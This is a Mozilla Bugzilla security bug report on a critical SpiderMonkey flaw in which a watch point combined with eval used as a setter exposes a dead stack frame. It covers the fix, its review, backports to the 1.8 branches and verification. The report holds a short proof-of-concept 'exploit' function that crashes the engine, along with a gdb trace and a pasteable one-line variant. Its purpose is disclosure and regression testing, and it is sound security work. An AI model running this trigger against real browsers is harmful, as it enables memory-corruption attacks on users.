Closed Bug 390597 Opened 17 years ago Closed 17 years ago

watch point + eval-as-setter allows access to dead JSStackFrame

Categories

(Core :: JavaScript Engine, defect)

Product:
Core
Component:
JavaScript Engine
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: sync2d, Assigned: mrbkap)

Details

(4 keywords, Whiteboard: [sg:critical?])

Attachments

(3 files)

FIx
1.22 KB, patch
brendan
: review+
brendan
: approval1.9+
Details | Diff | Splinter Review
js1_5/extensions/regress-390597.js
2.64 KB, text/plain
Details
1.8 branch patch
1.22 KB, patch
mrbkap
: review+
dveditz
: approval1.8.1.12+
asac
: approval1.8.0.next+
Details | Diff | Splinter Review 
$ cat watch-point-dead-stack.txt
function exploit() {
  var obj = this, args = null;
  obj.__defineSetter__("evil", eval);
  obj.watch("evil", function() { return "args = arguments;"; });
  obj.evil = null;
  eval("print(args[0]);");
}
exploit();

$ gdb --eval run --args dbg.obj/js watch-point-dead-stack.txt
...
Program received signal SIGSEGV, Segmentation fault.
0x0043729b in JS_GetReservedSlot (cx=<incomplete type>, obj=0x1, index=0,
    vp=0xa4e2cc) at jsapi.c:3971
3971        clasp = OBJ_GET_CLASS(cx, obj);
Attached patch FIxSplinter Review 
Wow, I didn't know it was possible to create an arguments object for the pseudo-frame. It's getting to be more and more like a real frame every day!
Assignee: general → mrbkap
Status: NEW → ASSIGNED
Attachment #275031 - Flags: review?(brendan)
Comment on attachment 275031 [details] [diff] [review]
FIx

Indeed. Need to be careful there isn't more like this (I don't know of any, just sayin').

/be
Attachment #275031 - Flags: review?(brendan)
Attachment #275031 - Flags: review+
Attachment #275031 - Flags: approval1.9?
Comment on attachment 275031 [details] [diff] [review]
FIx

Sorry, a=me.

/be
Attachment #275031 - Flags: approval1.9? → approval1.9+
Fix checked into trunk, finally.
Status: ASSIGNED → RESOLVED
Closed: 17 years ago
Resolution: --- → FIXED
I am sure this is a stoopid question, but why does the browser throw "EvalError: function eval must be called directly, and not by way of a function of another name" but the shell doesn't?
Flags: in-testsuite+
Sounds like another XOW problem. Try using 'obj.eval' as the setter function?
(In reply to comment #6)
> Sounds like another XOW problem. Try using 'obj.eval' as the setter function?
> 

that removed the EvalError. Bug?
Yeah, it's a bug.
Depends on: 397071
No longer depends on: 397071
verified fixed 1.9.0 linux/mac*/win

this crashes in the browser 1.8.1. do we want it on the branch?
Status: RESOLVED → VERIFIED
Flags: blocking1.8.1.9?
Flags: blocking1.8.1.10?
blake, brendan: does this patch work for the 1.8 branch or do we need a different fix (or none)? Can we land this in a day or two, or should we wait for 1.8.1.11?
Whiteboard: [sg:critical?]
Flags: blocking1.8.1.10?
Flags: wanted1.8.1.x+
Flags: blocking1.8.1.12?
Flags: blocking1.8.1.12+
If this patch applies to the 1.8 branch can you please request approval? Otherwise, please attach a branch patch.

(QA: To test, use the JS 'shell' bookmarklet.)
Keywords: testcase
Whiteboard: [sg:critical?] → [sg:critical?] [need 1.8 branch patch]
Attached patch 1.8 branch patchSplinter Review 
I had to hand merge because the watchpoint thread-safety fixes never went in on the 1.8 branch. The patch was trivial to merge.
Attachment #294507 - Flags: review+
Attachment #294507 - Flags: approval1.8.1.12?
Whiteboard: [sg:critical?] [need 1.8 branch patch] → [sg:critical?]
Comment on attachment 294507 [details] [diff] [review]
1.8 branch patch

approved for 1.8.1.12, a=dveditz for release-drivers
Attachment #294507 - Flags: approval1.8.1.12? → approval1.8.1.12+
Fixed on the 1.8 branch.
Keywords: fixed1.8.1.12
I crashed 2.0.0.11 by pasting (with much-cleaner linebreaks!):

function exploit() { try { var obj = this, args = null; obj.__defineSetter__("evil", eval); obj.watch("evil", function() { return "args = arguments;"; }); obj.evil = null; eval("print(args[0]);"); } catch(ex) { print('Caught ' + ex); } } exploit();

into Jesse's handy JS "shell" bookmarklet, on Windows XP.

With Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080128 Firefox/2.0.0.12, I get |undefined|, and no crash.

Replacing fixed1.8.1.12 with verified1.8.1.12; special thanks to bc for the support/sanity-checking.
Keywords: fixed1.8.1.12verified1.8.1.12
Group: security
Flags: blocking1.8.0.15+
Comment on attachment 294507 [details] [diff] [review]
1.8 branch patch

a=asac for 1.8.0.15

(unmodified distro patch)
Attachment #294507 - Flags: approval1.8.0.15+
MOZILLA_1_8_0_BRANCH:

Checking in js/src/jsdbgapi.c;
/cvsroot/mozilla/js/src/jsdbgapi.c,v  <--  jsdbgapi.c
new revision: 3.56.2.1.4.13; previous revision: 3.56.2.1.4.12
done
Keywords: fixed1.8.0.15
/cvsroot/mozilla/js/tests/js1_5/extensions/regress-390597.js,v  <--  regress-390597.js
initial revision: 1.1
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: